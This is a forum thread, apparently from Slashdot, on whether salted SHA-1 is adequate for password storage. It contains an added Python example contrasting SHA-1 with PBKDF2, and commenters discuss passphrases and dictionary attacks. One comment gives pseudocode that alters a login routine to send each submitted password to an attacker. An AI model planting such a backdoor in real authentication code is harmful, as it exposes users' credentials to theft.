Are You Sure SHA-1+Salt Is Enough For Passwords?
Melchett writes "It's all too common that Web (and other) applications use MD5, SHA1, or SHA-256 to hash user passwords, and more enlightened developers even salt the password. And over the years I've seen heated discussions on just how salt values should be generated and on how long they should be.
Unfortunately in most cases people overlook the fact that MD and SHA hash families are designed for computational speed, and the quality of your salt values doesn't really matter when an attacker has gained full control, as happened with rootkit.com. When an attacker has root access, they will get your passwords, salt, and the code that you use to verify the passwords."
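An added illustration of the submission's point about hash speed (example code, not from the article or from any commenter): it compares the per-guess cost of a single salted SHA-1 against a deliberately slow, iterated password hash (PBKDF2-HMAC-SHA256 from Python's standard library, used here as a stand-in for bcrypt/scrypt), assuming the attacker already holds the salt and the stored digest, exactly the post-compromise situation described above. The iteration count, salt length and record format are choices made for this example, not values the article specifies.

```python
import hashlib
import hmac
import os
import time

# Parameters chosen for this illustration only (not taken from the article).
PBKDF2_ITERATIONS = 100_000
SALT_BYTES = 16


def hash_sha1_salted(password: str, salt: bytes) -> bytes:
    """The scheme the submission questions: one SHA-1 over salt || password."""
    return hashlib.sha1(salt + password.encode("utf-8")).digest()


def hash_pbkdf2(password: str, salt: bytes, iterations: int = PBKDF2_ITERATIONS) -> bytes:
    """A deliberately slow password hash: PBKDF2-HMAC-SHA256 iterated many times."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)


def store_pbkdf2(password: str) -> str:
    """Build a stored record 'iterations$salt_hex$hash_hex' with a fresh random salt."""
    salt = os.urandom(SALT_BYTES)
    digest = hash_pbkdf2(password, salt)
    return f"{PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_pbkdf2(password: str, record: str) -> bool:
    """Check a candidate against a stored record; compare digests in constant time."""
    iterations_s, salt_hex, hash_hex = record.split("$")
    digest = hash_pbkdf2(password, bytes.fromhex(salt_hex), int(iterations_s))
    return hmac.compare_digest(digest, bytes.fromhex(hash_hex))


def seconds_per_guess(hash_fn, salt: bytes, guesses: int) -> float:
    """Average cost of one candidate for someone who already has the salt."""
    start = time.perf_counter()
    for i in range(guesses):
        hash_fn(f"candidate{i}", salt)  # constructed candidate strings
    return (time.perf_counter() - start) / guesses


def cost_ratio() -> float:
    """How many times more work one PBKDF2 guess costs than one salted SHA-1 guess."""
    salt = os.urandom(SALT_BYTES)
    fast = seconds_per_guess(hash_sha1_salted, salt, 20_000)
    slow = seconds_per_guess(hash_pbkdf2, salt, 5)
    return slow / fast


if __name__ == "__main__":
    record = store_pbkdf2("correct horse battery staple")
    print("verify right password:", verify_pbkdf2("correct horse battery staple", record))
    print("verify wrong password:", verify_pbkdf2("password", record))
    print(f"one PBKDF2 guess costs about {cost_ratio():,.0f}x one salted SHA-1 guess")
```

The salt still does its job in both schemes (it defeats precomputed tables and forces one attack per user), but only the iterated hash raises the cost of every single guess, which is the lever that matters once salt, digest and verification code are all in the attacker's hands.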
Like TFA says, worry more about the passwords people choose. It doesn't matter if you use SHA-1, MD5, or an HMAC, if the idiot types "password" for his password, it's going to be discovered on the first loop of anyone's "common passwords" list.
One way to get people to comply better is simply to refer to it as a "passphrase" instead of a "password". Maybe enforce "three word minimum" or something. Even if they just use a line from a movie, it's increased the search space dramatically over a single word.
John
I don't get it - surely it shouldn't matter if someone gains access to the password verification routine, the salt and the encrypted passwords... unless the password hashing/encryption is easily reversible?
They've still got to try and brute force match the encrypted data with a dictionary attack - sure, having the salt makes it easier - but if you've got the salt and the encrypted passwords it doesn't matter what encryption algorithm is used, you've still got to use a brute force dictionary attack. Most encryption algorithms aren't easily reversible - and that's the whole point.
The box is rooted, nothing you do matters. Just change the code...
CHANGE:
string pass = request("userspass")
if UNBREAKABLYGOODHASH(pass, salthash) = RetrieveSaltedDBpasshash(username) {
UserAuthenticated
}
TO:
string pass = request("userspass")
SendTheHackerThePassword(pass)
if UNBREAKABLYGOODHASH(pass, salthash) = RetrieveSaltedDBpasshash(username) {
UserAuthenticated
}
And you're done... Just wait for the passwords to come rolling in.
Any rooted machine that handles the user's actual password can be coerced into giving it up. So limit what machines see that password. Have your web client hash the password before it goes to the host (even when it's a secure connection). That would help, though the client machines should be easiest to hack, but at least it takes longer to get the right password.